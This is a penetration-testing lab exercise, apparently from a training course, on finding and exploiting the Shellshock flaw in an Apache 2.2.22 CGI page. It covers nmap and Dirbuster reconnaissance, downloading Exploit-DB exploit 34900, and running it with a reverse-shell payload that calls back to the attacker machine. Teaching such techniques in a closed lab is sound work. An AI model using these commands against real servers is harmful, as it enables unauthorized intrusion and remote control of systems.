Module 08: Web Application Penetration Testing Methodology 9

Exercise 9: Pentesting Apache Web Server Vulnerability

Scenario

A web server is a hardware/ software application delivers web pages on request to clients using the Hypertext Transfer Protocol (HTTP). This means delivery of HTML documents and any additional content that may be included, such as video, images, style sheets, and scripts. Attackers usually target the vulnerabilities in the software to gain authorized entry to the server.
As a penetration tester, you need to know how to identify the vulnerabilities and exploit them to gain access to the server.
In this lab, you are going to learn how to:
i. Identify Apache server vulnerability
ii. Browse the vulnerable webpage
iii. Exploit the vulnerability to gain access to the server

Lab Duration: 25 Minutes

1. Click Kali Linux (External Network).
   If Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
   
2. Type root in the Username field and click Next.
   
3. Type toor in the password field and click Sign In.
   
4. In this lab, we are going to perform pentesting on a machine with IP Address 172.19.19.19.
5. Let us begin by performing a Nmap aggressive scan on the target machine.
   Type nmap -T4 -A 172.19.19.19 and press Enter. This will initiate the scan as shown in the screenshot below:
   
6. From the scan result, it is observed that there is only one open port (80) on the machine, meaning there may be a website deployed on the web server.
   
7. Now, launch a web browser, type http://172.19.19.19 in the address bar and press Enter.
   This displays a default webpage of Apache web server.
   
8. Now, we shall brute force directories and files names on web servers using Dirbuster.
   To brute force, switch to command line terminal, type dirbuster, and press Enter.
   This launches the Dirbuster application.
   
9. Type http://172.19.19.19 in the Target URL field and click Browse.
   
10. Directory listing window appears, navigate to /usr/share/dirbuster/wordlists, select directory-list-2.3-medium.txt and click Select List.
    
11. Once you select the list, click Start to begin the directory brute force attack.
    
12. Dirbuster begins to perform brute force attack on the web server and displays the results under the Scan Information tab.
    Click Results - List View tab to view the results in list format.
    
13. You will observe that there is a /cgi-bin/directory holding a file named profile.
    
14. To view the contents of the file, right-click on /cgi-bin/profile and click Open In Browser.
    
15. It is observed that the profile page exists in the /cgi-bin directory.
    
16. Based on the information obtained, we shall now search for exploits related to apache 2.2.22 and cgi-bin together.
    While looking for the suitable exploits in Google (from the local machine), the first exploit result is Exploit-db/SearchSploit ID 34900 which exploits the Shellshock vulnerability.
    
17. Click Stop button in the Dirbuster window to stop the directory brute force.
    
18. Close Dirbuster application.
    
19. Now, we shall copy the exploit with the Exploit-DB/SearchSploit ID 34900 to the root folder using SearchSploit.
    To copy, type searchsploit -m 34900 in the command line terminal and press Enter.
    This downloads the exploit to the root folder.
    
20. We shall now read the python script to view the exploit usage/PoC.
    To view, type leafpad 34900.py in the command line terminal and press Enter.
    
21. The python code appears in the Leafpad text editor. Observe the Example section to view the usage.
    In this lab, we will be providing the lhost, rhost, lport, payload and pages options to the exploit.
    
22. Type python 34900.py payload=reverse rhost=172.19.19.19 lhost=172.19.19.7 lport=4455 pages=/cgi-bin/profile in the command line terminal and press Enter.
    

    1. payload refers to the type of payload we specify
    2. rhost refers to the IP address of the target machine
    3. lhost refers to the IP address of Kali Linux machine
    4. lport refers to the local port of the Kali Linux machine
    5. pages refer to the specific webpage(s) on which the vulnerability was observed

    more...
    
23. Once you run the python script, it exploits the vulnerability and returns a shell as shown in the screenshot below, inferring that the Shellshock vulnerability has been successfully exploited.
    

In this lab, you have learned how to:
i. Identify Apache server vulnerability
ii. Browse the vulnerable webpage
iii. Exploit the vulnerability to gain access to the server